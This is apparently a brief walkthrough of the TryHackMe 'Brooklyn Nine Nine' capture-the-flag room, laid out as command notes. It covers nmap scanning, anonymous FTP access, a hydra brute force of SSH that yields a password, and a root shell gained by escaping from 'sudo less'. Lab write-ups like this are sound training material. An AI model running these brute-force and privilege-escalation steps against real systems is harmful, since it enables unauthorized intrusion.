Brooklyn Nine Nine
Room Link: https://tryhackme.com/room/brooklynninenine
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP
anonymous login worked
Kali
ftp $VICTIM
Username: anonymous


TCP/22 - SSH
Kali
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://$VICTIM

Kali
ssh jake@$VICTIM
Password: 987654321

Privlege Escalation
Victim
sudo less /etc/profile
!/bin/sh

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt



I tried to see if I could get any more info from the image but I never did.
Kali
exiftool brooklyn99.jpg
steghide info brooklyn99.jpg
Last updated